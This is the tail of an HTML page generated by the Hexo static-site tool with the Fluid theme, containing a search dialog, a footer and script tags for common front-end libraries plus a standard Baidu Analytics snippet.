  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>












  
    <!-- Baidu Analytics -->
    <script defer>
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?ee9387c15cc7097331ccc74141d07081";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
